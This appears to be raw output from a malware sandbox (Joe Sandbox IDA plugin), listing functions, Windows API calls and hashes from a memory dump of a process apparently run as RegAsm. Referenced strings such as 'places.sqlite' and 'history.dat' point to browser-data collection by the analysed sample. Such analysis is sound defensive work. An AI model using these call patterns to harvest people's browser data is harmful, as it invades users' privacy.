                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                        • String ID: history.dat$places.sqlite
                                                                                                                                        • API String ID: 2641622041-467022611
                                                                                                                                        • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                        • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 839530781-0
                                                                                                                                        • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                        • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                        • String ID: *.*$index.dat
                                                                                                                                        • API String ID: 1974802433-2863569691
                                                                                                                                        • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                        • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3397143404-0
                                                                                                                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                        • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1125800050-0
                                                                                                                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleSleep
                                                                                                                                        • String ID: }A
                                                                                                                                        • API String ID: 252777609-2138825249
                                                                                                                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                        APIs
                                                                                                                                        • malloc.MSVCRT ref: 00409A10
                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                        • free.MSVCRT ref: 00409A31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: freemallocmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3056473165-0
                                                                                                                                        • Opcode ID: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                        • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                        • Opcode Fuzzy Hash: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                        • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID: BINARY
                                                                                                                                        • API String ID: 2221118986-907554435
                                                                                                                                        • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                        • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                        • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                        • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 568699880-0
                                                                                                                                        • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                        • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                        • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                        • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                        • String ID: /stext
                                                                                                                                        • API String ID: 2081463915-3817206916
                                                                                                                                        • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                        • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1023896661-0
                                                                                                                                        • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                        • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                        • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                        • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2445788494-0
                                                                                                                                        • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                        • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                                                                        • API String ID: 2803490479-1168259600
                                                                                                                                        • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                        • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                        • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                        • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmpmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1065087418-0
                                                                                                                                        • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                        • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1381354015-0
                                                                                                                                        • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                        • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                        • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                        • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                        • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2154303073-0
                                                                                                                                        • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                        • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PointerRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3154509469-0
                                                                                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4232544981-0
                                                                                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                        APIs
                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
